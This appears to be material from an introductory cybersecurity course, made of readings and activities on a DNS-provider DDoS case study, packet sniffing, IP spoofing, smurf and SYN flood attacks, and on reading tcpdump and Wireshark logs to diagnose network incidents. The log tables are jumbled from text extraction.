website domain names into the IP address of the system that contains the information for the website.
For instance, if a user were to type in a website URL, a DNS server would translate that into a numeric IP
address that directs network traffic to the location of the website’s server.
On the day of the DDoS attack we are studying, many large companies were using a DNS service
provider. The service provider was hosting the DNS system for these companies. This meant that when
internet users typed in the URL of the website they wanted to access, their devices would be directed to
the right place. On October 21, 2016, the service provider was the victim of a DDoS attack.
Leading up to the attack
Before the attack on the service provider, a group of university students created a botnet with the
intention to attack various gaming servers and networks. A botnet is a collection of computers infected
by malware that are under the control of a single threat actor, known as the “bot-herder." Each
computer in the botnet can be remotely controlled to send a data packet to a target system. In a botnet
attack, cyber criminals instruct all the bots on the botnet to send data packets to the target system at the
same time, resulting in a DDoS attack.
The group of university students posted the code for the botnet online so that it would be accessible to
thousands of internet users and authorities wouldn’t be able to trace the botnet back to the students. In
doing so, they made it possible for other malicious actors to learn the code to the botnet and control it
remotely. This included the cyber criminals who attacked the DNS service provider.
The day of attack
At 7:00 a.m. on the day of the attack, the botnet sent tens of millions of DNS requests to the service
provider. This overwhelmed the system and the DNS service shut down. This meant that all of the
websites that used the service provider could not be reached. When users tried to access various
websites that used the service provider, they were not directed to the website they typed in their
browser. Outages for each web service occurred all over North America and Europe.
The service provider’s systems were restored after only two hours of downtime. Although the cyber
criminals sent subsequent waves of botnet attacks, the DNS company was prepared and able to mitigate
the impact.
Key takeaways
As demonstrated in the above example, DDoS attacks can be very damaging to an organization. As a
security analyst, it’s important to acknowledge the seriousness of such an attack so that you’re aware of
opportunities to protect the network from them. If your network has important operations distributed
across hosts that can be dynamically scaled, then operations can continue if the baseline host
infrastructure goes offline. DDoS attacks are damaging, but there are concrete actions that security
analysts can take to help protect their organizations. Keep going through this course and you will learn
about common mitigation strategies to protect against DDoS attacks.
To pass this practice quiz, you must receive 100%, or 1 out of 1 point, by completing the following
activity. You can learn more about graded and practice items in the course overview.
Activity Overview
In this activity, you will analyze DNS and ICMP traffic in transit using data from a network protocol
analyzer tool. You will identify which network protocol was utilized in assessment of the cybersecurity
incident.
In the internet layer of the TCP/IP model, the IP formats data packets into IP datagrams. The
information provided in the datagram of an IP packet can provide security analysts with insight into
suspicious data packets in transit.
Knowing how to identify potentially malicious traffic on a network can help cybersecurity analysts
assess security risks on a network and reinforce network security.
Scenario
You are a cybersecurity analyst working at a company that specializes in providing IT consultant
services. Several customers contacted your company to report that they were not able to access the
company website www.yummyrecipesforme.com, and saw the error “destination port unreachable”
after waiting for the page to load.
You are tasked with analyzing the situation and determining which network protocol was affected
during this incident. To start, you visit the website and you also receive the error “destination port
unreachable.” Next, you load your network analyzer tool, tcpdump, and load the webpage again. This
time, you receive a lot of packets in your network analyzer. The analyzer shows that when you send UDP
packets and receive an ICMP response returned to your host, the results contain an error message: “udp
port 53 unreachable.”
In the DNS and ICMP log, you find the following information:
1. In the first two lines of the log file, you see the initial outgoing request from your computer to
the DNS server requesting the IP address of yummyrecipesforme.com. This request is sent in a
UDP packet.
2. Next you find timestamps that indicate when the event happened. In the log, this is the first
sequence of numbers displayed. For example: 13:24:32.192571. This displays the time 1:24
p.m., 32.192571 seconds.
3. The source and destination IP address is next. In the error log, this information is displayed as:
192.51.100.15.52444 > 203.0.113.2.domain. The IP address to the left of the greater than (>)
symbol is the source address. In this example, the source is your computer’s IP address. The IP
address to the right of the greater than (>) symbol is the destination IP address. In this case, it is
the IP address for the DNS server: 203.0.113.2.domain
4. The second and third lines of the log show the response to your initial ICMP request packet. In
this case, the ICMP 203.0.113.2 line is the start of the error message indicating that the ICMP
packet was undeliverable to the port of the DNS server.
5. Next are the protocol and port number, which displays which protocol was used to handle
communications and which port it was delivered to. In the error log, this appears as: udp port 53
unreachable. This means that the UDP protocol was used to request a domain name resolution
using the address of the DNS server over port 53. Port 53, which aligns to the .domain extension
in 203.0.113.2.domain, is a well-known port for DNS service. The word “unreachable” in the
message indicates the message did not go through to the DNS server. Your browser was not able
to obtain the IP address for yummyrecipesforme.com, which it needs to access the website
because no service was listening on the receiving DNS port as indicated by the ICMP error
message “udp port 53 unreachable.”
6. The remaining lines in the log indicate that ICMP packets were sent two more times, but the
same delivery error was received both times.
Now that you have captured data packets using a network analyzer tool, it is your job to identify which
network protocol and service were impacted by this incident. Then, you will need to write a follow-up
report.
As an analyst, you can inspect network traffic and network data to determine what is causing networkrelated issues during cybersecurity incidents. Later in this course, you will demonstrate how to manage
and resolve incidents. For now, you only need to analyze the situation.
This incident, in the meantime, is being handled by security engineers after you and other analysts have
reported the issue to your direct supervisor.
Step-By-Step Instructions
Follow the instructions and answer the question below to complete the activity. Then, go to the next
course item to compare your work to a completed exemplar.
Step 1: Access the template
To use the template for this course item, click the link below and select Use Template.
Use the sentence starters and prompts provided in the template to support your thinking and ensure
that you include all relevant details about the incident.
Link to template:
●
Cybersecurity incident report template
OR
If you don’t have a Google account, you can download the template directly from the attachment below.
Cybersecurity incident report network traffic analysis
DOCX File
Step 2
Step 2: Access supporting materials
The following supporting materials will help you complete this activity. Keep them open as you proceed
to the next steps.
To use the supporting materials for this course item, click the following links and select Use Template.
Link to supporting materials:
●
OR
Example of a Cybersecurity Incident Report
If you don’t have a Google account, you can download the supporting materials directly from the
attachment below.
Example of a Cybersecurity Incident Report
DOCX File
Steps 3 and 4
Step 3: Provide a summary of the problem found in the DNS
and ICMP traffic log
The network traffic analyzer tool inspects all IP packets traveling through the network
interfaces of the machine it runs on. Network packets are recorded into a file. After
analyzing the data presented to you from the DNS and ICMP traffic log, identify trends in
the data. Assess which protocol is producing the error message when resolving the URL
with the DNS server for the yummyrecipesforme.com website. Recall that one of the ports
that is displayed repeatedly is port 53, commonly used for DNS. In your analysis:
Include a summary of the DNS and ICMP log analysis and identify which protocol
was used for the ICMP traffic.
● Provide a few details about what was indicated in the logs.
● Interpret the issues found in the logs.
●
Record your responses in part one of the cybersecurity incident report.
Step 4: Explain your analysis of the data and provide one
solution to implement
Now that you’ve inspected the traffic log and identified trends in the traffic, describe why
the error messages appeared on the log. Use your answer in the previous step and the
scenario to identify the reason behind the ICMP error messages. The error messages
indicate that there is an issue with a specific port. What do the different protocols involved
in the log reveal about the incident? In your response:
State when the problem was first reported.
Provide the scenario, events, and symptoms identified when the event was first
reported.
● Describe the information discovered while investigating the issue up to this point.
● Explain the current status of the issue.
● Provide the suspected root cause of the problem.
●
●
What to Include in Your Response
Be sure to address the following items in your completed activity:
●
●
Provide a summary of the problem found in the DNS and ICMP traffic log
Explain your analysis of the data and provide one possible cause of the incident
Assessment of Exemplar
Compare the exemplar to your completed activity. Review your work using each of the
criteria in the exemplar. What did you do well? Where can you improve? Use your answers
to these questions to guide you as you continue to progress through the course.
Note: The exemplar offers one possible approach to investigating and analyzing a possible
security event. In your role as a security analyst, you and your team would make a best
guess about what happened and then investigate further to troubleshoot the issue and
strengthen the overall security of your network.
Writing an effective cybersecurity analysis report can help troubleshoot network issues
and vulnerabilities more quickly and effectively. The more practice you have analyzing
network traffic for suspicious trends and activity, the more effective you and your team will
be at managing and responding to risks that are present on your network.
Key takeaways
As a security analyst, you may not always know exactly what is at the root of a network
issue or a possible attack. But being able to analyze the IP packets involved will help you
make a best guess about what happened or potentially prevent an attack from invading the
network. The network protocol and traffic logs will become the starting point for
investigating the issue further and addressing the attack.
Malicious Packet Sniffing
We'll discuss packet sniffing, with a focus on how threat actors may use this technique to gain
unauthorized access to information. Previously, you learned about the information and data
packets that travel across the network. Packets include a header which contains the sender's and
receiver's IP addresses. Packets also contain a body, which may contain valuable information like
names, date of birth, personal messages, financial information, and
credit card numbers. Packet sniffing is the practice of using software tools to observe data as it
moves across a network. As a security analyst, you may use packet sniffing to analyze and capture
packets when investigating ongoing incidents or debugging network issues. However, malicious
actors may also use packet sniffing to look at data that has not been sent to them. This is a little bit
like opening somebody else's mail. It's important for you to learn about how threat actors use
packet sniffing with harmful intent so you can be prepared to protect against these malicious acts.
Malicious actors may insert themselves in the middle of an authorized connection between two
devices. Then they can use packet sniffing to spy on every data packet as it comes across their
device. The goal is to find valuable information in the data packets that they can then use to their
advantage. Attackers can use software applications or a hardware device to look into data packets.
Malicious actors can access a network packet with a packet sniffer and make changes to the data.
They may change the information in the body of the packet, like altering a recipient's bank account
number. Packet sniffing can be passive or active. Passive packet sniffing is a type of attack where
data packets are read in transit. Since all the traffic on a network is visible to any host on the hub,
malicious actors can view all the information going in and out of the device they are targeting.
Thinking back to the example of a letter being delivered, we can compare a passive packet sniffing
attack to a postal delivery person maliciously reading somebody's mail. The postal worker, or
packet sniffer, has the right to deliver the mail, but not the right to read the information inside.
Active packet sniffing is a type of attack where data packets are manipulated in transit. This may
include injecting internet protocols to redirect the packets to an unintended port or changing the
information the packet contains. Active packet sniffing attack would be like a neighbor telling the
delivery person "I'll deliver that mail for you," and then reading the mail or changing the letter
before putting it in your mailbox. Even though your neighbor knows you and even if they deliver it
to the correct house, they are actively going out of their way to engage in malicious behavior. The
good news is that malicious packet sniffing can be prevented. Let's look at a few ways the network
security professional can prevent these attacks. One way to protect against malicious packet sniffing
is to use a VPN to encrypt and protect data as it travels across the network. If you don't remember
how VPNs work, you can revisit the video about this topic in the previous section of the program.
When you use a VPN, hackers might interfere with your traffic, but they won't be able to decode it
to read it and read your private information. Another way to add a layer of protection against packet
sniffing is to make sure that websites you have use HTTPS at the beginning of the domain address.
Previously, we discussed how HTTPS uses SSL/TLS to encrypt data and prevent eavesdropping
when malicious actors spy on network transmissions. One final way to help protect yourself against
malicious packet sniffing is to avoid using unprotected WiFi. You usually find unprotected WiFi in
public places like coffee shops, restaurants, or airports. These networks don't use encryption. This
means that anyone on the network can access all of the data traveling to and from your device. One
precaution you can take is avoiding free public WiFiunless you have a VPN service already installed
on your device. Now you know how threat actors may use packet sniffing and how to protect a
network from these attacks.
IP Spoofing
IP spoofing is a network attack performed when an attacker changes the source IP of a data packet to
impersonate an authorized system and gain access to a network. In this kind of attack, the hacker is
pretending to be someone they are not so they can communicate over the network with the target
computer and get past firewall rules that may prevent outside traffic. Some common IP spoofing
attacks are on-path attacks, replay attacks, and smurf attacks. Let's discuss these one at a time. An
on-path attack is an attack where the malicious actor places themselves in the middle of an
authorized connection and intercepts or alters the data in transit. On-path attackers gain access to
the network and put themselves between two devices, like a web browser and a web server. Then
they sniff the packet information to learn the IP and MAC addresses to devices that are
communicating with each other. After they have this information, they can pretend to be either of
these devices. Another type of attack is a replay attack. A replay attack is a network attack performed
when a malicious actor intercepts a data packet in transit and delays it or repeats it at another time. A
delayed packet can cause connection issues between target computers, or a malicious actor may
take a network transmission that was sent by an authorized user and repeat it later to impersonate
the authorized user. A smurf attack is a combination of a DDoS attack and an IP spoofing attack. The
attacker sniffs an authorized user's IP address and floods it with packets. This overwhelms the
target computer and can bring down a server or the entire network. Now that you've learned about
different kinds of IP spoofing, let's talk about how you can protect the network from this kind of
attack. As you previously learned, encryption should always be implemented so that the data in
your network transfers can't be read by malicious actors. Firewalls can be configured to protect
against IP spoofing. IP spoofing makes it seem like the malicious actor is an authorized user by
changing the sender's address of the data packet to match the target network's address. So if a
firewall receives a data packet from the internet where the sender's IP address is the same as the
private network, then the firewall will deny the transmission since all the devices with that IP
address should already be on the local network. You can make sure that your firewalls configure
correctly by creating a rule to reject all incoming traffic that has the same IP address as the local
network. That's it for IP spoofing. You've learned how IP spoofing is used in some common attacks
like on-path attacks, replay attacks, and smurf attacks.
Overview of interception tactics
In the previous course items, you learned how packet sniffing and IP spoofing are used in network
attacks. Because these attacks intercept data packets as they travel across the network, they are called
interception attacks.
This reading will introduce you to some specific attacks that use packet sniffing and IP spoofing. You will
learn how hackers use these tactics and how security analysts can counter the threat of interception
attacks.
A closer review of packet sniffing
As you learned in a previous video, packet sniffing is the practice of capturing and inspecting data
packets across a network. On a private network, data packets are directed to the matching destination
device on the network.
The device’s Network Interface Card (NIC) is a piece of hardware that connects the device to a network.
The NIC reads the data transmission, and if it contains the device’s MAC address, it accepts the packet and
sends it to the device to process the information based on the protocol. This occurs in all standard
network operations. However, a NIC can be set to promiscuous mode, which means that it accepts all
traffic on the network, even the packets that aren’t addressed to the NIC’s device. You’ll learn more
about NIC’s later in the program. Malicious actors might use software like Wireshark to capture the data
on a private network and store it for later use. They can then use the personal information to their own
advantage. Alternatively, they might use the IP and MAC addresses of authorized users of the private
network to perform IP spoofing.
A closer review of IP spoofing
After a malicious actor has sniffed packets on the network, they can impersonate the IP and MAC
addresses of authorized devices to perform an IP spoofing attack. Firewalls can prevent IP spoofing
attacks by configuring it to refuse unauthorized IP packets and suspicious traffic. Next, you’ll examine a
few common IP spoofing attacks that are important to be familiar with as a security analyst.
On-path attack
An on-path attack happens when a hacker intercepts the communication between two devices or servers
that have a trusted relationship. The transmission between these two trusted network devices could
contain valuable information like usernames and passwords that the malicious actor can collect. An onpath attack is sometimes referred to as a meddler-in-the middle attack because the hacker is hiding in
the middle of communications between two trusted parties.
Or, it could be that the intercepted transmission contains a DNS system look-up. You’ll recall from an
earlier video that a DNS server translates website domain names into IP addresses. If a malicious actor
intercepts a transmission containing a DNS lookup, they could spoof the DNS response from the server
and redirect a domain name to a different IP address, perhaps one that contains malicious code or other
threats. The most important way to protect against an on-path attack is to encrypt your data in transit, e.g.
using TLS.
Smurf attack
A smurf attack is a network attack that is performed when an attacker sniffs an authorized user’s IP
address and floods it with packets. Once the spoofed packet reaches the broadcast address, it is sent to
all of the devices and servers on the network.
In a smurf attack, IP spoofing is combined with another denial of service (DoS) technique to flood the
network with unwanted traffic. For example, the spoofed packet could include an Internet Control
Message Protocol (ICMP) ping. As you learned earlier, ICMP is used to troubleshoot a network. But if too
many ICMP messages are transmitted, the ICMP echo responses overwhelm the servers on the network
and they shut down. This creates a denial of service and can bring an organization’s operations to a halt.
An important way to protect against a smurf attack is to use an advanced firewall that can monitor any
unusual traffic on the network. Most next generation firewalls (NGFW) include features that detect
network anomalies to ensure that oversized broadcasts are detected before they have a chance to bring
down the network.
DoS attack
As you’ve learned, once the malicious actor has sniffed the network traffic, they can impersonate an
authorized user. A Denial of Service attack is a class of attacks where the attacker prevents the
compromised system from performing legitimate activity or responding to legitimate traffic. Unlike IP
spoofing, however, the attacker will not receive a response from the targeted host. Everything about the
data packet is authorized including the IP address in the header of the packet. In IP spoofing attacks, the
malicious actor uses IP packets containing fake IP addresses. The attackers keep sending IP packets
containing fake IP addresses until the network server crashes.
Pro Tip: Remember the principle of defense-in-depth. There isn’t one perfect strategy for stopping each
kind of attack. You can layer your defense by using multiple strategies. In this case, using industry
standard encryption will strengthen your security and help you defend from DoS attacks on more than
one level.
Key takeaways
This reading covered several types of common IP spoofing attacks. You learned about how packet
sniffing is performed and how gathering information from intercepting data transmissions can give
malicious actors opportunities for IP spoofing. Whether it is an on-path attack, IP spoofing attack, or a
smurf attack, analysts need to ensure that mitigation strategies are in place to limit the threat and
prevent security breaches.
Activity Overview
In this activity, you will consider a scenario involving a customer of the company that you work for who
experiences a security issue when accessing the company’s website. You will identify the likely cause of
the service interruption. Then, you will explain how the attack occurred and the negative impact it had
on the website.
In this course, you have learned about several common network attacks. You have learned their names,
how they are carried out, and the characteristics of each attack from the perspective of the target.
Understanding how attacks impact a network will help you troubleshoot issues on your organization’s
network. It will also help you take steps to mitigate damage and protect a network from future attacks.
To review attacks, visit Identify: Network Attacks
Be sure to complete this activity before moving on. The next course item will provide you with a
completed exemplar to compare to your own work.
Scenario
Review the following scenario. Then complete the step-by-step instructions.
You work as a security analyst for a travel agency that advertises sales and promotions on the
company’s website. The employees of the company regularly access the company’s sales webpage to
search for vacation packages their customers might like.
One afternoon, you receive an automated alert from your monitoring system indicating a problem with
the web server. You attempt to visit the company’s website, but you receive a connection timeout error
message in your browser.
You use a packet sniffer to capture data packets in transit to and from the web server. You notice a large
number of TCP SYN requests coming from an unfamiliar IP address. The web server appears to be
overwhelmed by the volume of incoming traffic and is losing its ability to respond to the abnormally
large number of SYN requests. You suspect the server is under attack by a malicious actor.
You take the server offline temporarily so that the machine can recover and return to a normal
operating status. You also configure the company’s firewall to block the IP address that was sending the
abnormal number of SYN requests. You know that your IP blocking solution won’t last long, as an
attacker can spoof other IP addresses to get around this block. You need to alert your manager about
this problem quickly and discuss the next steps to stop this attacker and prevent this problem from
happening again. You will need to be prepared to tell your boss about the type of attack you discovered
and how it was affecting the web server and employees.
Step-By-Step Instructions
Step 1: Access the template
To use the template for this course item, click the link below and select Use Template.
Link to template: Cybersecurity incident report
Step 2: Access supporting materials
The following supporting materials will help you complete this activity. Keep them open as you proceed
to the next steps.
To use the supporting materials for this course item, click the following links and select Use Template.
Links to supporting materials:
●
How to read a Wireshark TCP/HTTP log
How to read a Wireshark TCP/HTTP log
In this reading, you’ll learn how to read a Wireshark TCP/HTTP log for network traffic between
employee website visitors and the company’s web server. Most network protocol/traffic analyzer
tools used to capture packets will provide this same information.
Log entry number and time
No. Time
47 3.144521
48 3.195755
49 3.246989
This Wireshark TCP log section provided to you starts at log entry number (No.) 47, which is three
seconds and .144521 milliseconds after the logging tool started recording. This indicates that
approximately 47 messages were sent and received by the web server in the 3.1 seconds after
starting the log. This rapid traffic speed is why the tool tracks time in milliseconds.
Source and destination IP addresses
Source
Destination
198.51.100.23 192.0.2.1
192.0.2.1
198.51.100.23
198.51.100.23 192.0.2.1
The source and destination columns contain the source IP address of the machine that is sending a
packet and the intended destination IP address of the packet. In this log file, the IP address
192.0.2.1 belongs to the company’s web server. The range of IP addresses in 198.51.100.0/24
belong to the employees’ computers.
Protocol type and related information
Protocol Info
TCP
42584->443 [SYN] Seq=0 Win-5792 Len=120...
TCP
443->42584 [SYN, ACK] Seq=0 Win-5792 Len=120...
TCP
42584->443 [ACK] Seq=1 Win-5792 Len=120...
The Protocol column indicates that the packets are being sent using the TCP protocol, which is at
the transport layer of the TCP/IP model. In the given log file, you will notice that the protocol will
eventually change to HTTP, at the application layer, once the connection to the web server is
successfully established.
The Info column provides information about the packet. It lists the source port followed by an
arrow → pointing to the destination port. In this case, port 443 belongs to the web server. Port 443
is normally used for encrypted web traffic.
The next data element given in the Info column is part of the three-way handshake process to
establish a connection between two machines. In this case, employees are trying to connect to the
company’s web server:
●
●
●
The [SYN] packet is the initial request from an employee visitor trying to connect to a web
page hosted on the web server. SYN stands for “synchronize.”
The [SYN, ACK] packet is the web server’s response to the visitor’s request agreeing to the
connection. The server will reserve system resources for the final step of the handshake.
SYN, ACK stands for “synchronize acknowledge.”
The [ACK] packet is the visitor’s machine acknowledging the permission to connect. This is
the final step required to make a successful TCP connection. ACK stands for “acknowledge.”
The next few items in the Info column provide more details about the packets. However, this data is
not needed to complete this activity. If you would like to learn more about packet properties, please
visit Microsoft’s Introduction to Network Trace Analysis.
Normal website traffic
A normal transaction between a website visitor and the web server would be like:
No. Time
Source
Destination
47 3.144521 198.51.100.23 192.0.2.1
48 3.195755 192.0.2.1
Protocol Info
TCP
198.51.100.23 TCP
42584->443 [SYN] Seq=0 Win=5792 Len=120...
443->42584 [SYN, ACK] Seq=0 Win-5792
Len=120...
49 3.246989 198.51.100.23 192.0.2.1
TCP
42584->443 [ACK] Seq=1 Win-5792 Len=120...
50 3.298223 198.51.100.23 192.0.2.1
HTTP
GET /sales.html HTTP/1.1
51 3.349457 192.0.2.1
198.51.100.23 HTTP
HTTP/1.1 200 OK (text/html)
Notice that the handshake process takes a few milliseconds to complete. Then, you can identify the
employee’s browser requesting the sales.html webpage using the HTTP protocol at the application
level of the TCP/IP model. Followed by the web server responding to the request.
The Attack
As you learned previously, malicious actors can take advantage of the TCP protocol by flooding a
server with SYN packet requests for the first part of the handshake. However, if the number of SYN
requests is greater than the server resources available to handle the requests, then the server will
become overwhelmed and unable to respond to the requests. This is a network level denial of
service (DoS) attack, called a SYN flood attack, that targets network bandwidth to slow traffic. A
SYN flood attack simulates a TCP connection and floods the server with SYN packets. A DoS direct
attack originates from a single source. A distributed denial of service (DDoS) attack comes from
multiple sources, often in different locations, making it more difficult to identify the attacker or
attackers.
There are two tabs at the bottom of the log file. One is labeled “Color coded TCP log.” If you click on
that tab, you will find the server interactions with the attacker’s IP address (203.0.113.0) marked
with red highlighting (and the word “red” in column A).
Color as
text
No. Time
Source
Destination
(x = redacted) (x = redacted) Protocol Info
red 52 3.390692 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 53 3.441926 192.0.2.1
203.0.113.0
TCP
443->54770 [SYN, ACK] Seq=0 Win5792 Len=120...
red 54 3.493160 203.0.113.0
192.0.2.1
TCP
54770->443 [ACK Seq=1 Win=5792
Len=0...
green 55 3.544394 198.51.100.14 192.0.2.1
TCP
14785->443 [SYN] Seq=0 Win-5792
Len=120...
198.51.100.14 TCP
443->14785 [SYN, ACK] Seq=0 Win5792 Len=120...
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
green 58 3.730097 198.51.100.14 192.0.2.1
TCP
14785->443 [ACK] Seq=1 Win-5792
Len=120...
TCP
54770->443 [SYN] Seq=0 Win-5792
Len=120...
HTTP
GET /sales.html HTTP/1.1
TCP
54770->443 [SYN] Seq=0 Win-5792
Len=120...
green 56 3.599628 192.0.2.1
red 57 3.664863 203.0.113.0
red 59 3.795332 203.0.113.0
192.0.2.1
green 60 3.860567 198.51.100.14 192.0.2.1
red 61 3.939499 203.0.113.0
green 62 4.018431 192.0.2.1
192.0.2.1
198.51.100.14 HTTP
HTTP/1.1 200 OK (text/html)
Initially, the attacker’s SYN request is answered normally by the web server (log items 52-54).
However, the attacker keeps sending more SYN requests, which is abnormal. At this point, the web
server is still able to respond to normal visitor traffic, which is highlighted and labeled as green. An
employee visitor with the IP address of 198.51.100.14 successfully completes a SYN/ACK
connection handshake with the webserver (log item nos. 55, 56, 58). Then, the employee’s browser
requests the sales.html webpage with the GET command and the web server responds (log item no.
60 and 62).
Color as
text
No. Time
Source
Destination
Protocol Info
192.0.2.1
TCP
33638->443 [SYN] Seq=0 Win-5792
Len=120...
203.0.113.0
TCP
443->54770 [SYN, ACK] Seq=0 Win5792 Len=120...
198.51.100.5
TCP
443->33638 [SYN, ACK] Seq=0 Win5792 Len=120...
red 66 4.256159 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
green 67 5.235091 198.51.100.5
192.0.2.1
TCP
33638->443 [ACK] Seq=1 Win-5792
Len=120...
green 63 4.097363 198.51.100.5
red 64 4.176295 192.0.2.1
green 65 4.255227 192.0.2.1
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
green 69 5.236955 198.51.100.16 192.0.2.1
TCP
32641->443 [SYN] Seq=0 Win-5792
Len=120...
red 68 5.236023 203.0.113.0
red 70 5.237887 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
green 71 6.228728 198.51.100.5
192.0.2.1
HTTP
GET /sales.html HTTP/1.1
red 72 6.229638 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
198.51.100.16 TCP
443->32641 [RST, ACK] Seq=0 Win5792 Len=120...
red 74 6.330539 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
green 75 6.330885 198.51.100.7
192.0.2.1
TCP
42584->443 [SYN] Seq=0 Win=5792
Len=0...
red 76 6.331231 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
198.51.100.5
TCP
HTTP/1.1 504 Gateway Time-out
(text/html)
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
green 79 7.340768 198.51.100.22 192.0.2.1
TCP
6345->443 [SYN] Seq=0 Win=5792
Len=0...
198.51.100.7
TCP
443->42584 [RST, ACK] Seq=1 Win5792 Len=120...
red 81 7.340778 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 82 7.340783 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 83 7.439658 192.0.2.1
203.0.113.0
TCP
443->54770 [RST, ACK] Seq=1
Win=5792 Len=0...
yellow 73 6.230548 192.0.2.1
yellow 77 7.330577 192.0.2.1
red 78 7.331323 203.0.113.0
yellow 80 7.340773 192.0.2.1
In the next 20 rows, the log begins to reflect the struggle the web server is having to keep up with
the abnormal number of SYN requests coming in at a rapid pace. The attacker is sending several
SYN requests every second. The rows highlighted and labeled yellow are failed communications
between legitimate employee website visitors and the web server.
The two types of errors in the logs include:
●
An HTTP/1.1 504 Gateway Time-out (text/html) error message. This message is generated
by a gateway server that was waiting for a response from the web server. If the web server
takes too long to respond, the gateway server will send a timeout error message to the
requesting browser.
●
An [RST, ACK] packet, which would be sent to the requesting visitor if the [SYN, ACK] packet
is not received by the web server. RST stands for reset, acknowledge. The visitor will
receive a timeout error message in their browser and the connection attempt is dropped.
The visitor can refresh their browser to attempt to send a new SYN request.
Color
as text No. Time
Source
Destination
(x = redacted) (x = redacted) Protocol Info
red 119 19.198705 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 120 19.521718 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
198.51.100.9
TCP
443->4631 [RST, ACK] Seq=1 Win=5792
Len=0...
red 122 20.167744 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 123 20.490757 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 124 20.81377
203.0.113.0
TCP
443->54770 [RST, ACK] Seq=1
Win=5792 Len=0...
red 125 21.136783 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 126 21.459796 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 127 21.782809 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 128 22.105822 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 129 22.428835 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 130 22.751848 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 131 23.074861 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 132 23.397874 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 133 23.720887 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 134 24.0439
203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 135 24.366913 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 136 24.689926 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
yellow 121 19.844731 192.0.2.1
192.0.2.1
red 137 25.012939 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 138 25.335952 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 139 25.658965 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 140 25.981978 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 141 26.304991 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 142 26.628004 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 143 26.951017 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 144 27.27403
203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 145 27.597043 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 146 27.920056 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 147 28.243069 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 148 28.566082 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 149 28.889095 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 150 29.212108 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 151 29.535121 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
red 152 29.858134 203.0.113.0
192.0.2.1
TCP
54770->443 [SYN] Seq=0 Win=5792
Len=0...
As you scroll through the rest of the log, you will notice the web server stops responding
to legitimate employee visitor traffic. The visitors receive more error messages indicating that they
cannot establish or maintain a connection to the web server. From log item number 125 on, the web
server stops responding. The only items logged at that point are from the attack. As there is only
one IP address attacking the web server, you can assume this is a direct DoS SYN flood attack.
Step 3: Identify the type of attack causing this network interruption
Reflect on the types of network intrusion attacks that you have learned about in this course
so far. As a security analyst, identifying the type of network attack based on the incident is
the first step to managing the attack and preventing similar attacks in the future.
Here are some questions to consider when determining what type of attack occurred:
What do you currently understand about network attacks?
Which type of attack would likely result in the symptoms described in the scenario?
What is the difference between a denial of service (DoS) and distributed denial of
service (DDoS)?
● Why is the website taking a long time to load and reporting a connection timeout
error?
●
●
●
Review the Wireshark reading from step 2 and try to identify patterns in the logged
network traffic. Analyze the patterns to determine which type of network attack occurred.
Write your analysis in section one of the Cybersecurity incident report template provided.
